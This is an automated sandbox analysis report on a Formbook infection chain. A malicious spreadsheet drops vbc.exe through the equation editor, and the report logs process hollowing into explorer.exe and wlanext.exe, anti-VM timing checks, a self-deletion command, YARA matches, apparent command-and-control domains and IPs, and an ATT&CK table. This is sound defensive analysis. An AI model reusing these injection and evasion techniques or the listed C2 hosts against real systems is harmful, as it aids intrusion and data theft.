          Source: C:\Users\Public\vbc.exeCode function: 7_2_00408C70
          Source: C:\Users\Public\vbc.exeCode function: 7_2_00402D90
          Source: C:\Users\Public\vbc.exeCode function: 7_2_00402FB0
          Source: C:\Users\Public\vbc.exeCode function: 7_2_0092E0C6
          Source: C:\Users\Public\vbc.exeCode function: 7_2_0095D005
          Source: C:\Users\Public\vbc.exeCode function: 7_2_0094905A
          Source: C:\Users\Public\vbc.exeCode function: 7_2_00933040
          Source: C:\Users\Public\vbc.exeCode function: 7_2_0092E2E9
          Source: C:\Users\Public\vbc.exeCode function: 7_2_009D1238
          Source: C:\Users\Public\vbc.exeCode function: 7_2_009D63BF
          Source: C:\Users\Public\vbc.exeCode function: 7_2_009563DB
          Source: C:\Users\Public\vbc.exeCode function: 7_2_0092F3CF
          Source: C:\Users\Public\vbc.exeCode function: 7_2_00932305
          Source: C:\Users\Public\vbc.exeCode function: 7_2_00937353
          Source: C:\Users\Public\vbc.exeCode function: 7_2_0097A37B
          Source: C:\Users\Public\vbc.exeCode function: 7_2_00965485
          Source: C:\Users\Public\vbc.exeCode function: 7_2_00941489
          Source: C:\Users\Public\vbc.exeCode function: 7_2_009B443E
          Source: C:\Users\Public\vbc.exeCode function: 7_2_0096D47D
          Source: C:\Users\Public\vbc.exeCode function: 7_2_0094C5F0
          Source: C:\Users\Public\vbc.exeCode function: 7_2_0093351F
          Source: C:\Users\Public\vbc.exeCode function: 7_2_00976540
          Source: C:\Users\Public\vbc.exeCode function: 7_2_00934680
          Source: C:\Users\Public\vbc.exeCode function: 7_2_0093E6C1
          Source: C:\Users\Public\vbc.exeCode function: 7_2_0097A634
          Source: C:\Users\Public\vbc.exeCode function: 7_2_009D2622
          Source: C:\Users\Public\vbc.exeCode function: 7_2_009B579A
          Source: C:\Users\Public\vbc.exeCode function: 7_2_0093C7BC
          Source: C:\Users\Public\vbc.exeCode function: 7_2_009657C3
          Source: C:\Users\Public\vbc.exeCode function: 7_2_009CF8EE
          Source: C:\Users\Public\vbc.exeCode function: 7_2_0093C85C
          Source: C:\Users\Public\vbc.exeCode function: 7_2_0095286D
          Source: C:\Users\Public\vbc.exeCode function: 7_2_009D098E
          Source: C:\Users\Public\vbc.exeCode function: 7_2_009329B2
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_020D1238
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_0202E2E9
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_02032305
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_02037353
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_0207A37B
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_020D63BF
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_0202F3CF
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_020563DB
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_0205D005
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_02033040
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_0204905A
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_0202E0C6
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_020D2622
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_0207A634
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_02034680
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_0203E6C1
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_020B579A
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_0203C7BC
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_020657C3
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_020B443E
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_0206D47D
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_02065485
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_02041489
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_0203351F
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_02076540
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_0204C5F0
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_020E3A83
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_02057B00
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_020DCBA4
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_020BDBDA
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_0202FBD7
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_0203C85C
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_0205286D
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_020CF8EE
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_020B394B
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_020B5955
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_020D098E
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_020329B2
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_020469FE
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_02062E2F
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_0204EE4C
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_02040F3F
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_0205DF7C
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_020CCFB1
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_020A2FDC
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_02060D3B
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_0203CD5B
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_020CFDDD
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_000DCB21
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_000C8C70
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_000C2D90
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_000C2FB0
Source: new order.xlsx | OLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
Source: C:\Windows\SysWOW64\wlanext.exe | Code function: String function: 0202E2A8 appears 38 times
Source: C:\Windows\SysWOW64\wlanext.exe | Code function: String function: 0209F970 appears 84 times
Source: C:\Windows\SysWOW64\wlanext.exe | Code function: String function: 0202DF5C appears 119 times
Source: C:\Windows\SysWOW64\wlanext.exe | Code function: String function: 02073F92 appears 132 times
Source: C:\Windows\SysWOW64\wlanext.exe | Code function: String function: 0207373B appears 244 times
Source: C:\Users\Public\vbc.exe | Code function: String function: 0099F970 appears 49 times
Source: C:\Users\Public\vbc.exe | Code function: String function: 00973F92 appears 76 times
Source: C:\Users\Public\vbc.exe | Code function: String function: 0097373B appears 150 times
Source: C:\Users\Public\vbc.exe | Code function: String function: 0092DF5C appears 74 times
Source: 7.2.vbc.exe.400000.1.unpack, type: UNPACKEDPE | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 7.2.vbc.exe.400000.1.unpack, type: UNPACKEDPE | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 7.2.vbc.exe.400000.1.raw.unpack, type: UNPACKEDPE | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 7.2.vbc.exe.400000.1.raw.unpack, type: UNPACKEDPE | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000007.00000002.2246257528.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000007.00000002.2246257528.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000007.00000002.2246289635.0000000000430000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000007.00000002.2246289635.0000000000430000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000009.00000002.2373008475.0000000000210000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000009.00000002.2373008475.0000000000210000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000009.00000002.2372873928.00000000000C0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000009.00000002.2372873928.00000000000C0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000009.00000002.2372975665.00000000001E0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000009.00000002.2372975665.00000000001E0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000007.00000002.2246311708.0000000000460000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000007.00000002.2246311708.0000000000460000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: bin[1].exe.4.dr | Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: vbc.exe.4.dr | Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: explorer.exe, 00000008.00000000.2216707466.0000000003C40000.00000002.00000001.sdmp | Binary or memory string: .VBPud<_
Source: classification engine | Classification label: mal100.troj.expl.evad.winXLSX@9/13@4/3
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | File created: C:\Users\user\Desktop\~$new order.xlsx
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | File created: C:\Users\user\AppData\Local\Temp\CVRF6CC.tmp
Source: C:\Users\Public\vbc.exe | Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\7582400666d289c016013ad0f6e0e3e6\mscorlib.ni.dll
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | File read: C:\Users\desktop.ini
Source: C:\Users\Public\vbc.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\explorer.exe | File read: C:\Windows\System32\drivers\etc\hosts
Source: new order.xlsx | Virustotal: Detection: 30%
Source: new order.xlsx | ReversingLabs: Detection: 28%
Source: unknown | Process created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
Source: unknown | Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Process created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'
Source: C:\Users\Public\vbc.exe | Process created: C:\Users\Public\vbc.exe C:\Users\Public\vbc.exe
Source: C:\Windows\explorer.exe | Process created: C:\Windows\SysWOW64\wlanext.exe C:\Windows\SysWOW64\wlanext.exe
Source: C:\Windows\SysWOW64\wlanext.exe | Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\Public\vbc.exe'
Source: C:\Windows\explorer.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B196B286-BAB4-101A-B69C-00AA00341D07}\InprocServer32
Source: Window Recorder | Window detected: More than 3 window changes detected
Source: C:\Users\Public\vbc.exe | File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems
Source: new order.xlsx | Static file information: File size 1333760 > 1048576
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
Source: Binary string: wntdll.pdb source: vbc.exe, wlanext.exe
Source: Binary string: wlanext.pdb source: vbc.exe, 00000007.00000002.2246150655.00000000002A9000.00000004.00000020.sdmp
Source: new order.xlsx | Initial sample: OLE indicators vbamacros = False
Source: new order.xlsx | Initial sample: OLE indicators encrypted = True
Source: C:\Users\Public\vbc.exe | Code function: 7_2_0040D06C push ebp; iretd
Source: C:\Users\Public\vbc.exe | Code function: 7_2_0041C2C2 push FFFFFFF6h; ret
Source: C:\Users\Public\vbc.exe | Code function: 7_2_00415324 push edi; retf
Source: C:\Users\Public\vbc.exe | Code function: 7_2_0041B3C5 push eax; ret
Source: C:\Users\Public\vbc.exe | Code function: 7_2_0041B47C push eax; ret
Source: C:\Users\Public\vbc.exe | Code function: 7_2_0041B412 push eax; ret
Source: C:\Users\Public\vbc.exe | Code function: 7_2_0041B41B push eax; ret
Source: C:\Users\Public\vbc.exe | Code function: 7_2_0041576D push edx; retf
Source: C:\Users\Public\vbc.exe | Code function: 7_2_00415770 push edx; retf
Source: C:\Users\Public\vbc.exe | Code function: 7_2_00415F11 push cs; retf
Source: C:\Users\Public\vbc.exe | Code function: 7_2_00415FD6 push cs; retf
Source: C:\Users\Public\vbc.exe | Code function: 7_2_008C426E push esp; ret
Source: C:\Users\Public\vbc.exe | Code function: 7_2_008C1596 push ss; ret
Source: C:\Users\Public\vbc.exe | Code function: 7_2_00846D4B push ecx; retf
Source: C:\Users\Public\vbc.exe | Code function: 7_2_008C5F8B push cs; ret
Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 9_2_0202DFA1 push ecx; ret
Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 9_2_000CD06C push ebp; iretd
Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 9_2_000DC2C2 push FFFFFFF6h; ret
Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 9_2_000D5324 push edi; retf
Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 9_2_000DB3C5 push eax; ret
Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 9_2_000DB41B push eax; ret
Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 9_2_000DB412 push eax; ret
Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 9_2_000DB47C push eax; ret
Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 9_2_000D576D push edx; retf
Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 9_2_000D5770 push edx; retf
Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 9_2_000D5F11 push cs; retf
Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 9_2_000D5FD6 push cs; retf
Source: initial sample | Static PE information: section name: .text entropy: 7.75944853561
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\bin[1].exe
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | File created: C:\Users\Public\vbc.exe

Boot Survival:

Drops PE files to the user root directory
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | File created: C:\Users\Public\vbc.exe
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Process information set: NOOPENFILEERRORBOX (9 identical entries)
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Process information set: NOOPENFILEERRORBOX (8 identical entries)
Source: C:\Users\Public\vbc.exe | Process information set: NOOPENFILEERRORBOX (17 identical entries)
Source: C:\Windows\SysWOW64\wlanext.exe | Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: new order.xlsx | Stream path 'EncryptedPackage' entropy: 7.99890686533 (max. 8.0)

Malware Analysis System Evasion:

Tries to detect virtualization through RDTSC time measurements
Source: C:\Users\Public\vbc.exe | RDTSC instruction interceptor: First address: 00000000004085F4 second address: 00000000004085FA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Users\Public\vbc.exe | RDTSC instruction interceptor: First address: 000000000040898E second address: 0000000000408994 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\wlanext.exe | RDTSC instruction interceptor: First address: 00000000000C85F4 second address: 00000000000C85FA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\wlanext.exe | RDTSC instruction interceptor: First address: 00000000000C898E second address: 00000000000C8994 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Users\Public\vbc.exe | Code function: 7_2_004088C0 rdtsc
Source: C:\Users\Public\vbc.exe | Thread delayed: delay time: 922337203685477
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 2352 | Thread sleep time: -180000s >= -30000s
Source: C:\Users\Public\vbc.exe TID: 2580 | Thread sleep time: -56221s >= -30000s
Source: C:\Users\Public\vbc.exe TID: 2524 | Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\explorer.exe | Last function: Thread delayed
Source: C:\Windows\SysWOW64\wlanext.exe | Last function: Thread delayed
Source: C:\Users\Public\vbc.exe | Thread delayed: delay time: 56221
Source: C:\Users\Public\vbc.exe | Thread delayed: delay time: 922337203685477
Source: explorer.exe, 00000008.00000000.2217725190.0000000004234000.00000004.00000001.sdmp | Binary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\5&22BE343F&0&000000
Source: explorer.exe, 00000008.00000000.2231668260.00000000001F5000.00000004.00000020.sdmp | Binary or memory string: \\?\IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000008.00000000.2217760556.0000000004263000.00000004.00000001.sdmp | Binary or memory string: \\?\ide#cdromnecvmwar_vmware_sata_cd01_______________1.00____#6&373888b8&0&1.0.0#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}ies
Source: explorer.exe, 00000008.00000000.2217725190.0000000004234000.00000004.00000001.sdmp | Binary or memory string: IDE\CDROMNECVMWAR_VMWARE_SATA_CD01_______________1.00____\6&373888B8&0&1.0.0
Source: explorer.exe, 00000008.00000000.2211654384.0000000000231000.00000004.00000020.sdmp | Binary or memory string: IDE\CDROMNECVMWAR_VMWARE_SATA_CD01_______________1.00____\6&373888B8&0&1.0.0&E}
Source: C:\Users\Public\vbc.exe | Process information queried: ProcessInformation
Source: C:\Users\Public\vbc.exe | Process queried: DebugPort
Source: C:\Windows\SysWOW64\wlanext.exe | Process queried: DebugPort
Source: C:\Users\Public\vbc.exe | Code function: 7_2_004088C0 rdtsc
Source: C:\Users\Public\vbc.exe | Code function: 7_2_00409B30 LdrLoadDll,
Source: C:\Users\Public\vbc.exe | Code function: 7_2_009326F8 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 9_2_020326F8 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\Public\vbc.exe | Process token adjusted: Debug
Source: C:\Windows\SysWOW64\wlanext.exe | Process token adjusted: Debug
Source: C:\Users\Public\vbc.exe | Memory allocated: page read and write | page guard

HIPS / PFW / Operating System Protection Evasion:

System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\explorer.exe | Domain query: www.compareionizers.com
Source: C:\Windows\explorer.exe | Domain query: www.thinking-diversity.com
Source: C:\Windows\explorer.exe | Network Connect: 199.59.242.153 80
Source: C:\Windows\explorer.exe | Network Connect: 34.102.136.180 80
Source: C:\Windows\explorer.exe | Domain query: www.globaltradeview.com
Injects a PE file into a foreign processes
Source: C:\Users\Public\vbc.exe | Memory written: C:\Users\Public\vbc.exe base: 400000 value starts with: 4D5A
Maps a DLL or memory area into another process
Source: C:\Users\Public\vbc.exe | Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
Source: C:\Users\Public\vbc.exe | Section loaded: unknown target: C:\Windows\SysWOW64\wlanext.exe protection: execute and read and write
Source: C:\Users\Public\vbc.exe | Section loaded: unknown target: C:\Windows\SysWOW64\wlanext.exe protection: execute and read and write
Source: C:\Windows\SysWOW64\wlanext.exe | Section loaded: unknown target: C:\Windows\explorer.exe protection: read write
Source: C:\Windows\SysWOW64\wlanext.exe | Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
Modifies the context of a thread in another process (thread injection)
Source: C:\Users\Public\vbc.exe | Thread register set: target process: 1388
Source: C:\Windows\SysWOW64\wlanext.exe | Thread register set: target process: 1388
Queues an APC in another process (thread injection)
Source: C:\Users\Public\vbc.exe | Thread APC queued: target process: C:\Windows\explorer.exe
Sample uses process hollowing technique
Source: C:\Users\Public\vbc.exe | Section unmapped: C:\Windows\SysWOW64\wlanext.exe base address: BE0000
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Process created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'
Source: C:\Users\Public\vbc.exe | Process created: C:\Users\Public\vbc.exe C:\Users\Public\vbc.exe
Source: C:\Windows\SysWOW64\wlanext.exe | Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\Public\vbc.exe'
Source: explorer.exe, 00000008.00000000.2211807817.00000000006F0000.00000002.00000001.sdmp | Binary or memory string: Program Manager
Source: explorer.exe, 00000008.00000000.2211807817.00000000006F0000.00000002.00000001.sdmp | Binary or memory string: Shell_TrayWnd
Source: explorer.exe, 00000008.00000000.2231668260.00000000001F5000.00000004.00000020.sdmp | Binary or memory string: Progman
Source: explorer.exe, 00000008.00000000.2211807817.00000000006F0000.00000002.00000001.sdmp | Binary or memory string: !Progman
Source: C:\Users\Public\vbc.exe | Queries volume information: C:\Users\Public\vbc.exe VolumeInformation
Source: C:\Users\Public\vbc.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Stealing of Sensitive Information:

Yara detected FormBook
Source: Yara match | File source: 7.2.vbc.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match | File source: 7.2.vbc.exe.400000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000007.00000002.2246257528.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000007.00000002.2246289635.0000000000430000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000009.00000002.2373008475.0000000000210000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000009.00000002.2372873928.00000000000C0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000009.00000002.2372975665.00000000001E0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000007.00000002.2246311708.0000000000460000.00000040.00000001.sdmp, type: MEMORY

Remote Access Functionality:

Yara detected FormBook
Source: Yara match | File source: 7.2.vbc.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match | File source: 7.2.vbc.exe.400000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000007.00000002.2246257528.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000007.00000002.2246289635.0000000000430000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000009.00000002.2373008475.0000000000210000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000009.00000002.2372873928.00000000000C0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000009.00000002.2372975665.00000000001E0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000007.00000002.2246311708.0000000000460000.00000040.00000001.sdmp, type: MEMORY

          Mitre Att&ck Matrix

| Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact |
| Valid Accounts | Shared Modules1 | Path Interception | Process Injection612 | Masquerading111 | OS Credential Dumping | Security Software Discovery221 | Remote Services | Archive Collected Data1 | Exfiltration Over Other Network Medium | Encrypted Channel1 | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | Modify System Partition |
| Default Accounts | Exploitation for Client Execution13 | Boot or Logon Initialization Scripts | Extra Window Memory Injection1 | Disable or Modify Tools1 | LSASS Memory | Process Discovery2 | Remote Desktop Protocol | Data from Removable Media | Exfiltration Over Bluetooth | Ingress Tool Transfer12 | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout |
| Domain Accounts | At (Linux) | Logon Script (Windows) | Logon Script (Windows) | Virtualization/Sandbox Evasion31 | Security Account Manager | Virtualization/Sandbox Evasion31 | SMB/Windows Admin Shares | Data from Network Shared Drive | Automated Exfiltration | Non-Application Layer Protocol2 | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data |
| Local Accounts | At (Windows) | Logon Script (Mac) | Logon Script (Mac) | Process Injection612 | NTDS | Remote System Discovery1 | Distributed Component Object Model | Input Capture | Scheduled Transfer | Application Layer Protocol122 | SIM Card Swap | | Carrier Billing Fraud |
| Cloud Accounts | Cron | Network Logon Script | Network Logon Script | Deobfuscate/Decode Files or Information1 | LSA Secrets | File and Directory Discovery1 | SSH | Keylogging | Data Transfer Size Limits | Fallback Channels | Manipulate Device Communication | | Manipulate App Store Rankings or Ratings |
| Replication Through Removable Media | Launchd | Rc.common | Rc.common | Obfuscated Files or Information41 | Cached Domain Credentials | System Information Discovery113 | VNC | GUI Input Capture | Exfiltration Over C2 Channel | Multiband Communication | Jamming or Denial of Service | | Abuse Accessibility Features |
